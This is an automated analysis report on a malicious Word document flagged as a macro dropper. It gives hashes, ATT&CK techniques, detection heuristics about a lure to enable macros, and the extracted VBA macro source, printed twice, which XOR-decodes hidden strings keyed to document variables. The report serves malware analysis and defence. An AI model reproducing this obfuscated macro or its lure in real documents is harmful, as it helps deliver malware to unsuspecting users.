Office (OLE) malware analysis — malicious · c9e3b6c234038dc3

MALICIOUS

Office (OLE)

431.5 KB Created: 2018-05-31 19:58:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: b0ceb6704362dab65ed79cc0ddb82cd4 SHA-1: d2a4e41be59f0eaad9701d1fb476640b3e6fe69f SHA-256: c9e3b6c234038dc32254f1f19606e4ef89e2d353816202c5d145682aa4966fea

102 Risk Score

Malware Insights

MITRE ATT&CK

T1566.001 Spearphishing Attachment T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros. The document body explicitly prompts the user to enable macros to decrypt sensitive information, a typical lure for malware droppers. The VBA macro code appears to be obfuscated but is designed to execute further malicious actions, likely involving downloading and executing a second-stage payload, as indicated by the ClamAV detection 'Doc.Dropper.Agent-6567106-0'.

Heuristics 4

ClamAV: Doc.Dropper.Agent-6567106-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6567106-0
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1919 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1919 bytes
SHA-256: `fed245b4509923eb56b7bdb19c85f968bdda86eed108d6168f61b8a65e7dca93`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "CommandButton1, 0, 0, MSForms, CommandButton" Private Sub Dfi() If ActiveDocument.Variables("xWdHoq").Value <> "toto" Then hvshYNWnGySsxcC ActiveDocument.Variables("xWdHoq").Value = "toto" If ActiveDocument.ReadOnly = False Then ActiveDocument.Save End If End If End Sub Private Sub CommandButton1_Click() Dfi End Sub Attribute VB_Name = "SamHZum" Private Function hBIOoCiVnq(ujkpovPmKJ As Variant, fotrsGTHOB As Integer) Dim EUKEBTHZRU, VlOzbjkPOq As String, KMBoDvGuCw, GAePituIuz VlOzbjkPOq = ActiveDocument.Variables("xWdHoq").Value() EUKEBTHZRU = "" KMBoDvGuCw = 1 While KMBoDvGuCw < UBound(ujkpovPmKJ) + 2 GAePituIuz = KMBoDvGuCw Mod Len(VlOzbjkPOq): If GAePituIuz = 0 Then GAePituIuz = Len(VlOzbjkPOq) EUKEBTHZRU = EUKEBTHZRU + Chr(Asc(Mid(VlOzbjkPOq, GAePituIuz + fotrsGTHOB, 1)) Xor CInt(ujkpovPmKJ(KMBoDvGuCw - 1))) KMBoDvGuCw = KMBoDvGuCw + 1 Wend hBIOoCiVnq = EUKEBTHZRU End Function Function OWlsViHdlNonIul(ByVal ijkPHCcdFp As String) As Boolean FileExists = (Dir(ijkPHCcdFp) <> "") End Function Public Function hvshYNWnGySsxcC() PxvtOuHS = hBIOoCiVnq(Array(12, 57, 46, 22, 5, 9, 120, 95, 11, 119), 18) atLyVEnCTYkdOBL = hBIOoCiVnq(Array(26, 63, 36, 15, 33, 21, 63, 3, 51, 80, 28, 15, 86, 53, 9, 28, 86, 6), 0) CLPcQ = "ExcludedString" MsgBox atLyVEnCTYkdOBL NjgDgLdHXBSR = hBIOoCiVnq(Array(30, 63, 67, 54, 98, 94, 119, 20, 70, 40, 62, 6, 27, 84, 12, 57, 95, 26, 43, 33, 68, _ 106, 55, 18, 36, 59, 61, 17, 4, 102, 58, 25), 39) VQDD = hBIOoCiVnq(Array(123, 110, 48, 35, 60, 64, 104, 49, 15, 35, 39), 28) MsgBox NjgDgLdHXBSR MsgBox VQDD End Function

SHA-256: fed245b4509923eb56b7bdb19c85f968bdda86eed108d6168f61b8a65e7dca93

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "CommandButton1, 0, 0, MSForms, CommandButton"
Private Sub Dfi()
If ActiveDocument.Variables("xWdHoq").Value <> "toto" Then
hvshYNWnGySsxcC
ActiveDocument.Variables("xWdHoq").Value = "toto"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub

Private Sub CommandButton1_Click()
Dfi
End Sub

Attribute VB_Name = "SamHZum"
Private Function hBIOoCiVnq(ujkpovPmKJ As Variant, fotrsGTHOB As Integer)
Dim EUKEBTHZRU, VlOzbjkPOq As String, KMBoDvGuCw, GAePituIuz
VlOzbjkPOq = ActiveDocument.Variables("xWdHoq").Value()
EUKEBTHZRU = ""
KMBoDvGuCw = 1
While KMBoDvGuCw < UBound(ujkpovPmKJ) + 2
GAePituIuz = KMBoDvGuCw Mod Len(VlOzbjkPOq): If GAePituIuz = 0 Then GAePituIuz = Len(VlOzbjkPOq)
EUKEBTHZRU = EUKEBTHZRU + Chr(Asc(Mid(VlOzbjkPOq, GAePituIuz + fotrsGTHOB, 1)) Xor CInt(ujkpovPmKJ(KMBoDvGuCw - 1)))
KMBoDvGuCw = KMBoDvGuCw + 1
Wend
hBIOoCiVnq = EUKEBTHZRU
End Function
Function OWlsViHdlNonIul(ByVal ijkPHCcdFp As String) As Boolean
FileExists = (Dir(ijkPHCcdFp) <> "")
End Function
Public Function hvshYNWnGySsxcC()
PxvtOuHS = hBIOoCiVnq(Array(12, 57, 46, 22, 5, 9, 120, 95, 11, 119), 18)
atLyVEnCTYkdOBL = hBIOoCiVnq(Array(26, 63, 36, 15, 33, 21, 63, 3, 51, 80, 28, 15, 86, 53, 9, 28, 86, 6), 0)
CLPcQ = "ExcludedString"
MsgBox atLyVEnCTYkdOBL
NjgDgLdHXBSR = hBIOoCiVnq(Array(30, 63, 67, 54, 98, 94, 119, 20, 70, 40, 62, 6, 27, 84, 12, 57, 95, 26, 43, 33, 68, _
106, 55, 18, 36, 59, 61, 17, 4, 102, 58, 25), 39)
VQDD = hBIOoCiVnq(Array(123, 110, 48, 35, 60, 64, 104, 49, 15, 35, 39), 28)
MsgBox NjgDgLdHXBSR
MsgBox VQDD
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.